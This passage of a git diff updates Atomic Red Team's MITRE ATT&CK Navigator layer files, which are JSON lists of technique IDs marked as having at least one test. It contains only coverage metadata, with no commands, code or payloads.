enabled":true},{"techniqueID":"T1497",
"score":100,"enabled":true},{"techniqueID":"T1505.002","score":100,"enabled":true},{"techniqueID":"T1505","score":100,"enabled":true},{"techniqueID":"T1505.003","score":100,"enabled":true},{"techniqueID":"T1518.001","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1529","score":100,"enabled":true},{"techniqueID":"T1531","score":100,"enabled":true},{"techniqueID":"T1543.003","score":100,"enabled":true},{"techniqueID":"T1543","score":100,"enabled":true},{"techniqueID":"T1546.001","score":100,"enabled":true},{"techniqueID":"T1546","score":100,"enabled":true},{"techniqueID":"T1546.002","score":100,"enabled":true},{"techniqueID":"T1546.003","score":100,"enabled":true},{"techniqueID":"T1546.007","score":100,"enabled":true},{"techniqueID":"T1546.008","score":100,"enabled":true},{"techniqueID":"T1546.010","score":100,"enabled":true},{"techniqueID":"T1546.011","score":100,"enabled":true},{"techniqueID":"T1546.012","score":100,"enabled":true},{"techniqueID":"T1546.013","score":100,"enabled":true},{"techniqueID":"T1547.001","score":100,"enabled":true},{"techniqueID":"T1547","score":100,"enabled":true},{"techniqueID":"T1547.004","score":100,"enabled":true},{"techniqueID":"T1547.005","score":100,"enabled":true},{"techniqueID":"T1547.009","score":100,"enabled":true},{"techniqueID":"T1547.010","score":100,"enabled":true},{"techniqueID":"T1548.002","score":100,"enabled":true},{"techniqueID":"T1548","score":100,"enabled":true},{"techniqueID":"T1550.002","score":100,"enabled":true},{"techniqueID":"T1550","score":100,"enabled":true},{"techniqueID":"T1550.003","score":100,"enabled":true},{"techniqueID":"T1552.001","score":100,"enabled":true},{"techniqueID":"T1552","score":100,"enabled":true},{"techniqueID":"T1552.002","score":100,"enabled":true},{"techniqueID":"T1552.004","score":100,"enabled":true},{"techniqueID":"T1552.006","score":100,"enabled":true},{"techniqueID":"T1553.004","score":1
00,"enabled":true},{"techniqueID":"T1553","score":100,"enabled":true},{"techniqueID":"T1555.003","score":100,"enabled":true},{"techniqueID":"T1555","score":100,"enabled":true},{"techniqueID":"T1555","score":100,"enabled":true},{"techniqueID":"T1556.002","score":100,"enabled":true},{"techniqueID":"T1556","score":100,"enabled":true},{"techniqueID":"T1558.001","score":100,"enabled":true},{"techniqueID":"T1558","score":100,"enabled":true},{"techniqueID":"T1558.003","score":100,"enabled":true},{"techniqueID":"T1559.002","score":100,"enabled":true},{"techniqueID":"T1559","score":100,"enabled":true},{"techniqueID":"T1560.001","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1562.001","score":100,"enabled":true},{"techniqueID":"T1562","score":100,"enabled":true},{"techniqueID":"T1562.002","score":100,"enabled":true},{"techniqueID":"T1562.004","score":100,"enabled":true},{"techniqueID":"T1563.002","score":100,"enabled":true},{"techniqueID":"T1563","score":100,"enabled":true},{"techniqueID":"T1564.001","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1564.003","score":100,"enabled":true},{"techniqueID":"T1564.004","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1566.001","score":100,"enabled":true},{"techniqueID":"T1566","score":100,"enabled":true},{"techniqueID":"T1569.002","score":100,"enabled":true},{"techniqueID":"T1569","score":100,"enabled":true},{"techniqueID":"T1571","score":100,"enabled":true},{"techniqueID":"T1573","score":100,"enabled":true},{"techniqueID":"T1574.001","score":100,"enabled":true},{"techniqueID":"T1574","score":100,"enabled":true},{"techniqueID":"T1574.002","score":100,"enabled":true},{"techniqueID":"T1574.009","score":100,"enabled":true},{"techniqueID":"T1574.011","score":100,"enabled":true},{"techniqueID":"T1574.012","score":100,"enabled":true}]} \ No 
newline at end of file +{"version":"4.1","name":"Atomic Red Team (Windows)","description":"Atomic Red Team (Windows) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.001","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1003.002","score":100,"enabled":true},{"techniqueID":"T1003.003","score":100,"enabled":true},{"techniqueID":"T1003.004","score":100,"enabled":true},{"techniqueID":"T1003.006","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1006","score":100,"enabled":true},{"techniqueID":"T1007","score":100,"enabled":true},{"techniqueID":"T1010","score":100,"enabled":true},{"techniqueID":"T1012","score":100,"enabled":true},{"techniqueID":"T1014","score":100,"enabled":true},{"techniqueID":"T1016","score":100,"enabled":true},{"techniqueID":"T1018","score":100,"enabled":true},{"techniqueID":"T1020","score":100,"enabled":true},{"techniqueID":"T1021.001","score":100,"enabled":true},{"techniqueID":"T1021","score":100,"enabled":true},{"techniqueID":"T1021.002","score":100,"enabled":true},{"techniqueID":"T1021.003","score":100,"enabled":true},{"techniqueID":"T1021.006","score":100,"enabled":true},{"techniqueID":"T1027.004","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1033","score":100,"enabled":true},{"techniqueID":"T1036.003","score":100,"enabled":true},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1036.004","score":100,"enabled":true},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1037.001","score":100,"enabled":true},{"techniqueID":"T1037","score":100,"enabled":true},{"techniqueID":"T1040","score":100,"enabled":true},{"techniqueID":"T1046","score":100,"en
abled":true},{"techniqueID":"T1047","score":100,"enabled":true},{"techniqueID":"T1048.003","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1049","score":100,"enabled":true},{"techniqueID":"T1053.002","score":100,"enabled":true},{"techniqueID":"T1053","score":100,"enabled":true},{"techniqueID":"T1053.005","score":100,"enabled":true},{"techniqueID":"T1055.001","score":100,"enabled":true},{"techniqueID":"T1055","score":100,"enabled":true},{"techniqueID":"T1055.004","score":100,"enabled":true},{"techniqueID":"T1055.012","score":100,"enabled":true},{"techniqueID":"T1055","score":100,"enabled":true},{"techniqueID":"T1056.001","score":100,"enabled":true},{"techniqueID":"T1056","score":100,"enabled":true},{"techniqueID":"T1056.002","score":100,"enabled":true},{"techniqueID":"T1056.004","score":100,"enabled":true},{"techniqueID":"T1057","score":100,"enabled":true},{"techniqueID":"T1059.001","score":100,"enabled":true},{"techniqueID":"T1059","score":100,"enabled":true},{"techniqueID":"T1059.003","score":100,"enabled":true},{"techniqueID":"T1059.005","score":100,"enabled":true},{"techniqueID":"T1069.001","score":100,"enabled":true},{"techniqueID":"T1069","score":100,"enabled":true},{"techniqueID":"T1069.002","score":100,"enabled":true},{"techniqueID":"T1070.001","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1070.003","score":100,"enabled":true},{"techniqueID":"T1070.004","score":100,"enabled":true},{"techniqueID":"T1070.005","score":100,"enabled":true},{"techniqueID":"T1070.006","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1071.001","score":100,"enabled":true},{"techniqueID":"T1071","score":100,"enabled":true},{"techniqueID":"T1071.004","score":100,"enabled":true},{"techniqueID":"T1074.001","score":100,"enabled":true},{"techniqueID":"T1074","score":100,"enabled":true},{"techniqueID":"T1078.001","score":100,"enabled":true},{"techni
queID":"T1078","score":100,"enabled":true},{"techniqueID":"T1078.003","score":100,"enabled":true},{"techniqueID":"T1082","score":100,"enabled":true},{"techniqueID":"T1083","score":100,"enabled":true},{"techniqueID":"T1087.001","score":100,"enabled":true},{"techniqueID":"T1087","score":100,"enabled":true},{"techniqueID":"T1087.002","score":100,"enabled":true},{"techniqueID":"T1090.001","score":100,"enabled":true},{"techniqueID":"T1090","score":100,"enabled":true},{"techniqueID":"T1095","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1105","score":100,"enabled":true},{"techniqueID":"T1106","score":100,"enabled":true},{"techniqueID":"T1110.001","score":100,"enabled":true},{"techniqueID":"T1110","score":100,"enabled":true},{"techniqueID":"T1110.002","score":100,"enabled":true},{"techniqueID":"T1110.003","score":100,"enabled":true},{"techniqueID":"T1112","score":100,"enabled":true},{"techniqueID":"T1113","score":100,"enabled":true},{"techniqueID":"T1114.001","score":100,"enabled":true},{"techniqueID":"T1114","score":100,"enabled":true},{"techniqueID":"T1115","score":100,"enabled":true},{"techniqueID":"T1119","score":100,"enabled":true},{"techniqueID":"T1120","score":100,"enabled":true},{"techniqueID":"T1123","score":100,"enabled":true},{"techniqueID":"T1124","score":100,"enabled":true},{"techniqueID":"T1127.001","score":100,"enabled":true},{"techniqueID":"T1127","score":100,"enabled":true},{"techniqueID":"T1133","score":100,"enabled":true},{"techniqueID":"T1134.001","score":100,"enabled":true},{"techniqueID":"T1134","score":100,"enabled":true},{"techniqueID":"T1134.004","score":100,"enabled":true},{"techniqueID":"T1135","score":100,"enabled":true},{"techniqueID":"T1136.001","score":100,"enabled":true},{"techniqueID":"T1136","score":100,"enabled":true},{"techniqueID":"T1136.002","score":100,"enabled":true},{"techniqueID":"T1137.002","score":100,"enabled":true},{"techniqueID":"T1137","score":100,"enabled":true},{"techniqueID"
:"T1137.004","score":100,"enabled":true},{"techniqueID":"T1137","score":100,"enabled":true},{"techniqueID":"T1140","score":100,"enabled":true},{"techniqueID":"T1176","score":100,"enabled":true},{"techniqueID":"T1197","score":100,"enabled":true},{"techniqueID":"T1201","score":100,"enabled":true},{"techniqueID":"T1202","score":100,"enabled":true},{"techniqueID":"T1204.002","score":100,"enabled":true},{"techniqueID":"T1204","score":100,"enabled":true},{"techniqueID":"T1207","score":100,"enabled":true},{"techniqueID":"T1216.001","score":100,"enabled":true},{"techniqueID":"T1216","score":100,"enabled":true},{"techniqueID":"T1216","score":100,"enabled":true},{"techniqueID":"T1217","score":100,"enabled":true},{"techniqueID":"T1218.001","score":100,"enabled":true},{"techniqueID":"T1218","score":100,"enabled":true},{"techniqueID":"T1218.002","score":100,"enabled":true},{"techniqueID":"T1218.003","score":100,"enabled":true},{"techniqueID":"T1218.004","score":100,"enabled":true},{"techniqueID":"T1218.005","score":100,"enabled":true},{"techniqueID":"T1218.007","score":100,"enabled":true},{"techniqueID":"T1218.008","score":100,"enabled":true},{"techniqueID":"T1218.009","score":100,"enabled":true},{"techniqueID":"T1218.010","score":100,"enabled":true},{"techniqueID":"T1218.011","score":100,"enabled":true},{"techniqueID":"T1218","score":100,"enabled":true},{"techniqueID":"T1219","score":100,"enabled":true},{"techniqueID":"T1220","score":100,"enabled":true},{"techniqueID":"T1221","score":100,"enabled":true},{"techniqueID":"T1222.001","score":100,"enabled":true},{"techniqueID":"T1222","score":100,"enabled":true},{"techniqueID":"T1482","score":100,"enabled":true},{"techniqueID":"T1485","score":100,"enabled":true},{"techniqueID":"T1489","score":100,"enabled":true},{"techniqueID":"T1490","score":100,"enabled":true},{"techniqueID":"T1491.001","score":100,"enabled":true},{"techniqueID":"T1491","score":100,"enabled":true},{"techniqueID":"T1497.001","score":100,"enabled":true},{"techniqueI
D":"T1497","score":100,"enabled":true},{"techniqueID":"T1505.002","score":100,"enabled":true},{"techniqueID":"T1505","score":100,"enabled":true},{"techniqueID":"T1505.003","score":100,"enabled":true},{"techniqueID":"T1518.001","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1529","score":100,"enabled":true},{"techniqueID":"T1531","score":100,"enabled":true},{"techniqueID":"T1543.003","score":100,"enabled":true},{"techniqueID":"T1543","score":100,"enabled":true},{"techniqueID":"T1546.001","score":100,"enabled":true},{"techniqueID":"T1546","score":100,"enabled":true},{"techniqueID":"T1546.002","score":100,"enabled":true},{"techniqueID":"T1546.003","score":100,"enabled":true},{"techniqueID":"T1546.007","score":100,"enabled":true},{"techniqueID":"T1546.008","score":100,"enabled":true},{"techniqueID":"T1546.010","score":100,"enabled":true},{"techniqueID":"T1546.011","score":100,"enabled":true},{"techniqueID":"T1546.012","score":100,"enabled":true},{"techniqueID":"T1546.013","score":100,"enabled":true},{"techniqueID":"T1547.001","score":100,"enabled":true},{"techniqueID":"T1547","score":100,"enabled":true},{"techniqueID":"T1547.004","score":100,"enabled":true},{"techniqueID":"T1547.005","score":100,"enabled":true},{"techniqueID":"T1547.009","score":100,"enabled":true},{"techniqueID":"T1547.010","score":100,"enabled":true},{"techniqueID":"T1548.002","score":100,"enabled":true},{"techniqueID":"T1548","score":100,"enabled":true},{"techniqueID":"T1550.002","score":100,"enabled":true},{"techniqueID":"T1550","score":100,"enabled":true},{"techniqueID":"T1550.003","score":100,"enabled":true},{"techniqueID":"T1552.001","score":100,"enabled":true},{"techniqueID":"T1552","score":100,"enabled":true},{"techniqueID":"T1552.002","score":100,"enabled":true},{"techniqueID":"T1552.004","score":100,"enabled":true},{"techniqueID":"T1552.006","score":100,"enabled":true},{"techniqueID":"T1553.004
","score":100,"enabled":true},{"techniqueID":"T1553","score":100,"enabled":true},{"techniqueID":"T1553.005","score":100,"enabled":true},{"techniqueID":"T1555.003","score":100,"enabled":true},{"techniqueID":"T1555","score":100,"enabled":true},{"techniqueID":"T1555","score":100,"enabled":true},{"techniqueID":"T1556.002","score":100,"enabled":true},{"techniqueID":"T1556","score":100,"enabled":true},{"techniqueID":"T1558.001","score":100,"enabled":true},{"techniqueID":"T1558","score":100,"enabled":true},{"techniqueID":"T1558.003","score":100,"enabled":true},{"techniqueID":"T1559.002","score":100,"enabled":true},{"techniqueID":"T1559","score":100,"enabled":true},{"techniqueID":"T1560.001","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1562.001","score":100,"enabled":true},{"techniqueID":"T1562","score":100,"enabled":true},{"techniqueID":"T1562.002","score":100,"enabled":true},{"techniqueID":"T1562.004","score":100,"enabled":true},{"techniqueID":"T1563.002","score":100,"enabled":true},{"techniqueID":"T1563","score":100,"enabled":true},{"techniqueID":"T1564.001","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1564.003","score":100,"enabled":true},{"techniqueID":"T1564.004","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1566.001","score":100,"enabled":true},{"techniqueID":"T1566","score":100,"enabled":true},{"techniqueID":"T1569.002","score":100,"enabled":true},{"techniqueID":"T1569","score":100,"enabled":true},{"techniqueID":"T1571","score":100,"enabled":true},{"techniqueID":"T1573","score":100,"enabled":true},{"techniqueID":"T1574.001","score":100,"enabled":true},{"techniqueID":"T1574","score":100,"enabled":true},{"techniqueID":"T1574.002","score":100,"enabled":true},{"techniqueID":"T1574.009","score":100,"enabled":true},{"techniqueID":"T1574.011","score":100,"enabled":true},{"t
echniqueID":"T1574.012","score":100,"enabled":true}]}
\ No newline at end of file
diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json
index 106fd708..08f59b92 100644
--- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json
+++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json
@@ -1 +1 @@ -{"version":"4.1","name":"Atomic Red Team","description":"Atomic Red Team MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.001","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1003.002","score":100,"enabled":true},{"techniqueID":"T1003.003","score":100,"enabled":true},{"techniqueID":"T1003.004","score":100,"enabled":true},{"techniqueID":"T1003.006","score":100,"enabled":true},{"techniqueID":"T1003.008","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1006","score":100,"enabled":true},{"techniqueID":"T1007","score":100,"enabled":true},{"techniqueID":"T1010","score":100,"enabled":true},{"techniqueID":"T1012","score":100,"enabled":true},{"techniqueID":"T1014","score":100,"enabled":true},{"techniqueID":"T1016","score":100,"enabled":true},{"techniqueID":"T1018","score":100,"enabled":true},{"techniqueID":"T1020","score":100,"enabled":true},{"techniqueID":"T1021.001","score":100,"enabled":true},{"techniqueID":"T1021","score":100,"enabled":true},{"techniqueID":"T1021.002","score":100,"enabled":true},{"techniqueID":"T1021.003","score":100,"enabled":true},{"techniqueID":"T1021.006","score":100,"enabled":true},{"techniqueID":"T1027.001","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1027.002","score":100,"enabled":true},{"techniqueID":"T1027.004","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1030","score":100,"enabled":true},{"techniqueID":"T1033","score":100,"enabled":true},{"techniqueID":"T1036.003","score":100,"enabled":true},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1036.004","score":100,"enabled":true},{"techniqueID":"T1036.006","score":100,"enabled":true},{"tech
niqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1037.001","score":100,"enabled":true},{"techniqueID":"T1037","score":100,"enabled":true},{"techniqueID":"T1037.002","score":100,"enabled":true},{"techniqueID":"T1037.004","score":100,"enabled":true},{"techniqueID":"T1037.005","score":100,"enabled":true},{"techniqueID":"T1040","score":100,"enabled":true},{"techniqueID":"T1046","score":100,"enabled":true},{"techniqueID":"T1047","score":100,"enabled":true},{"techniqueID":"T1048.003","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1049","score":100,"enabled":true},{"techniqueID":"T1053.001","score":100,"enabled":true},{"techniqueID":"T1053","score":100,"enabled":true},{"techniqueID":"T1053.002","score":100,"enabled":true},{"techniqueID":"T1053.003","score":100,"enabled":true},{"techniqueID":"T1053.004","score":100,"enabled":true},{"techniqueID":"T1053.005","score":100,"enabled":true},{"techniqueID":"T1053.006","score":100,"enabled":true},{"techniqueID":"T1053.007","score":100,"enabled":true},{"techniqueID":"T1055.001","score":100,"enabled":true},{"techniqueID":"T1055","score":100,"enabled":true},{"techniqueID":"T1055.004","score":100,"enabled":true},{"techniqueID":"T1055.012","score":100,"enabled":true},{"techniqueID":"T1055","score":100,"enabled":true},{"techniqueID":"T1056.001","score":100,"enabled":true},{"techniqueID":"T1056","score":100,"enabled":true},{"techniqueID":"T1056.002","score":100,"enabled":true},{"techniqueID":"T1056.004","score":100,"enabled":true},{"techniqueID":"T1057","score":100,"enabled":true},{"techniqueID":"T1059.001","score":100,"enabled":true},{"techniqueID":"T1059","score":100,"enabled":true},{"techniqueID":"T1059.002","score":100,"enabled":true},{"techniqueID":"T1059.003","score":100,"enabled":true},{"techniqueID":"T1059.004","score":100,"enabled":true},{"techniqueID":"T1059.005","score":100,"enabled":true},{"techniqueID":"T1059.006",
"score":100,"enabled":true},{"techniqueID":"T1069.001","score":100,"enabled":true},{"techniqueID":"T1069","score":100,"enabled":true},{"techniqueID":"T1069.002","score":100,"enabled":true},{"techniqueID":"T1070.001","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1070.002","score":100,"enabled":true},{"techniqueID":"T1070.003","score":100,"enabled":true},{"techniqueID":"T1070.004","score":100,"enabled":true},{"techniqueID":"T1070.005","score":100,"enabled":true},{"techniqueID":"T1070.006","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1071.001","score":100,"enabled":true},{"techniqueID":"T1071","score":100,"enabled":true},{"techniqueID":"T1071.004","score":100,"enabled":true},{"techniqueID":"T1074.001","score":100,"enabled":true},{"techniqueID":"T1074","score":100,"enabled":true},{"techniqueID":"T1078.001","score":100,"enabled":true},{"techniqueID":"T1078","score":100,"enabled":true},{"techniqueID":"T1078.003","score":100,"enabled":true},{"techniqueID":"T1082","score":100,"enabled":true},{"techniqueID":"T1083","score":100,"enabled":true},{"techniqueID":"T1087.001","score":100,"enabled":true},{"techniqueID":"T1087","score":100,"enabled":true},{"techniqueID":"T1087.002","score":100,"enabled":true},{"techniqueID":"T1090.001","score":100,"enabled":true},{"techniqueID":"T1090","score":100,"enabled":true},{"techniqueID":"T1095","score":100,"enabled":true},{"techniqueID":"T1098.004","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1105","score":100,"enabled":true},{"techniqueID":"T1106","score":100,"enabled":true},{"techniqueID":"T1110.001","score":100,"enabled":true},{"techniqueID":"T1110","score":100,"enabled":true},{"techniqueID":"T1110.002","score":100,"enabled":true},{"techniqueID":"T1110.003","score":100,"enabled":true},{"techniqueID":"T1112","score":100,"enabled":true},{"tec
hniqueID":"T1113","score":100,"enabled":true},{"techniqueID":"T1114.001","score":100,"enabled":true},{"techniqueID":"T1114","score":100,"enabled":true},{"techniqueID":"T1115","score":100,"enabled":true},{"techniqueID":"T1119","score":100,"enabled":true},{"techniqueID":"T1120","score":100,"enabled":true},{"techniqueID":"T1123","score":100,"enabled":true},{"techniqueID":"T1124","score":100,"enabled":true},{"techniqueID":"T1127.001","score":100,"enabled":true},{"techniqueID":"T1127","score":100,"enabled":true},{"techniqueID":"T1132.001","score":100,"enabled":true},{"techniqueID":"T1132","score":100,"enabled":true},{"techniqueID":"T1133","score":100,"enabled":true},{"techniqueID":"T1134.001","score":100,"enabled":true},{"techniqueID":"T1134","score":100,"enabled":true},{"techniqueID":"T1134.004","score":100,"enabled":true},{"techniqueID":"T1135","score":100,"enabled":true},{"techniqueID":"T1136.001","score":100,"enabled":true},{"techniqueID":"T1136","score":100,"enabled":true},{"techniqueID":"T1136.002","score":100,"enabled":true},{"techniqueID":"T1137.002","score":100,"enabled":true},{"techniqueID":"T1137","score":100,"enabled":true},{"techniqueID":"T1137.004","score":100,"enabled":true},{"techniqueID":"T1137","score":100,"enabled":true},{"techniqueID":"T1140","score":100,"enabled":true},{"techniqueID":"T1176","score":100,"enabled":true},{"techniqueID":"T1197","score":100,"enabled":true},{"techniqueID":"T1201","score":100,"enabled":true},{"techniqueID":"T1202","score":100,"enabled":true},{"techniqueID":"T1204.002","score":100,"enabled":true},{"techniqueID":"T1204","score":100,"enabled":true},{"techniqueID":"T1207","score":100,"enabled":true},{"techniqueID":"T1216.001","score":100,"enabled":true},{"techniqueID":"T1216","score":100,"enabled":true},{"techniqueID":"T1216","score":100,"enabled":true},{"techniqueID":"T1217","score":100,"enabled":true},{"techniqueID":"T1218.001","score":100,"enabled":true},{"techniqueID":"T1218","score":100,"enabled":true},{"techniqueID":"T12
18.002","score":100,"enabled":true},{"techniqueID":"T1218.003","score":100,"enabled":true},{"techniqueID":"T1218.004","score":100,"enabled":true},{"techniqueID":"T1218.005","score":100,"enabled":true},{"techniqueID":"T1218.007","score":100,"enabled":true},{"techniqueID":"T1218.008","score":100,"enabled":true},{"techniqueID":"T1218.009","score":100,"enabled":true},{"techniqueID":"T1218.010","score":100,"enabled":true},{"techniqueID":"T1218.011","score":100,"enabled":true},{"techniqueID":"T1218","score":100,"enabled":true},{"techniqueID":"T1219","score":100,"enabled":true},{"techniqueID":"T1220","score":100,"enabled":true},{"techniqueID":"T1221","score":100,"enabled":true},{"techniqueID":"T1222.001","score":100,"enabled":true},{"techniqueID":"T1222","score":100,"enabled":true},{"techniqueID":"T1222.002","score":100,"enabled":true},{"techniqueID":"T1482","score":100,"enabled":true},{"techniqueID":"T1485","score":100,"enabled":true},{"techniqueID":"T1486","score":100,"enabled":true},{"techniqueID":"T1489","score":100,"enabled":true},{"techniqueID":"T1490","score":100,"enabled":true},{"techniqueID":"T1491.001","score":100,"enabled":true},{"techniqueID":"T1491","score":100,"enabled":true},{"techniqueID":"T1496","score":100,"enabled":true},{"techniqueID":"T1497.001","score":100,"enabled":true},{"techniqueID":"T1497","score":100,"enabled":true},{"techniqueID":"T1505.002","score":100,"enabled":true},{"techniqueID":"T1505","score":100,"enabled":true},{"techniqueID":"T1505.003","score":100,"enabled":true},{"techniqueID":"T1518.001","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1529","score":100,"enabled":true},{"techniqueID":"T1531","score":100,"enabled":true},{"techniqueID":"T1543.001","score":100,"enabled":true},{"techniqueID":"T1543","score":100,"enabled":true},{"techniqueID":"T1543.002","score":100,"enabled":true},{"techniqueID":"T1543.003","score":100,"enabled":true},{"tec
hniqueID":"T1543.004","score":100,"enabled":true},{"techniqueID":"T1546.001","score":100,"enabled":true},{"techniqueID":"T1546","score":100,"enabled":true},{"techniqueID":"T1546.002","score":100,"enabled":true},{"techniqueID":"T1546.003","score":100,"enabled":true},{"techniqueID":"T1546.004","score":100,"enabled":true},{"techniqueID":"T1546.005","score":100,"enabled":true},{"techniqueID":"T1546.007","score":100,"enabled":true},{"techniqueID":"T1546.008","score":100,"enabled":true},{"techniqueID":"T1546.010","score":100,"enabled":true},{"techniqueID":"T1546.011","score":100,"enabled":true},{"techniqueID":"T1546.012","score":100,"enabled":true},{"techniqueID":"T1546.013","score":100,"enabled":true},{"techniqueID":"T1546.014","score":100,"enabled":true},{"techniqueID":"T1547.001","score":100,"enabled":true},{"techniqueID":"T1547","score":100,"enabled":true},{"techniqueID":"T1547.004","score":100,"enabled":true},{"techniqueID":"T1547.005","score":100,"enabled":true},{"techniqueID":"T1547.006","score":100,"enabled":true},{"techniqueID":"T1547.007","score":100,"enabled":true},{"techniqueID":"T1547.009","score":100,"enabled":true},{"techniqueID":"T1547.010","score":100,"enabled":true},{"techniqueID":"T1547.011","score":100,"enabled":true},{"techniqueID":"T1548.001","score":100,"enabled":true},{"techniqueID":"T1548","score":100,"enabled":true},{"techniqueID":"T1548.002","score":100,"enabled":true},{"techniqueID":"T1548.003","score":100,"enabled":true},{"techniqueID":"T1550.002","score":100,"enabled":true},{"techniqueID":"T1550","score":100,"enabled":true},{"techniqueID":"T1550.003","score":100,"enabled":true},{"techniqueID":"T1552.001","score":100,"enabled":true},{"techniqueID":"T1552","score":100,"enabled":true},{"techniqueID":"T1552.002","score":100,"enabled":true},{"techniqueID":"T1552.003","score":100,"enabled":true},{"techniqueID":"T1552.004","score":100,"enabled":true},{"techniqueID":"T1552.006","score":100,"enabled":true},{"techniqueID":"T1552.007","score":100,"enabl
ed":true},{"techniqueID":"T1553.001","score":100,"enabled":true},{"techniqueID":"T1553","score":100,"enabled":true},{"techniqueID":"T1553.004","score":100,"enabled":true},{"techniqueID":"T1555.001","score":100,"enabled":true},{"techniqueID":"T1555","score":100,"enabled":true},{"techniqueID":"T1555.003","score":100,"enabled":true},{"techniqueID":"T1555","score":100,"enabled":true},{"techniqueID":"T1556.002","score":100,"enabled":true},{"techniqueID":"T1556","score":100,"enabled":true},{"techniqueID":"T1558.001","score":100,"enabled":true},{"techniqueID":"T1558","score":100,"enabled":true},{"techniqueID":"T1558.003","score":100,"enabled":true},{"techniqueID":"T1559.002","score":100,"enabled":true},{"techniqueID":"T1559","score":100,"enabled":true},{"techniqueID":"T1560.001","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1560.002","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1562.001","score":100,"enabled":true},{"techniqueID":"T1562","score":100,"enabled":true},{"techniqueID":"T1562.002","score":100,"enabled":true},{"techniqueID":"T1562.003","score":100,"enabled":true},{"techniqueID":"T1562.004","score":100,"enabled":true},{"techniqueID":"T1562.006","score":100,"enabled":true},{"techniqueID":"T1563.002","score":100,"enabled":true},{"techniqueID":"T1563","score":100,"enabled":true},{"techniqueID":"T1564.001","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1564.002","score":100,"enabled":true},{"techniqueID":"T1564.003","score":100,"enabled":true},{"techniqueID":"T1564.004","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1566.001","score":100,"enabled":true},{"techniqueID":"T1566","score":100,"enabled":true},{"techniqueID":"T1569.001","score":100,"enabled":true},{"techniqueID":"T1569","score":100,"enabled":true},{"techniqueID":"T1569.002","score":100,"enabled":true},{"technique
ID":"T1571","score":100,"enabled":true},{"techniqueID":"T1573","score":100,"enabled":true},{"techniqueID":"T1574.001","score":100,"enabled":true},{"techniqueID":"T1574","score":100,"enabled":true},{"techniqueID":"T1574.002","score":100,"enabled":true},{"techniqueID":"T1574.006","score":100,"enabled":true},{"techniqueID":"T1574.009","score":100,"enabled":true},{"techniqueID":"T1574.011","score":100,"enabled":true},{"techniqueID":"T1574.012","score":100,"enabled":true},{"techniqueID":"T1609","score":100,"enabled":true},{"techniqueID":"T1610","score":100,"enabled":true},{"techniqueID":"T1611","score":100,"enabled":true}]} \ No newline at end of file +{"version":"4.1","name":"Atomic Red Team","description":"Atomic Red Team MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one 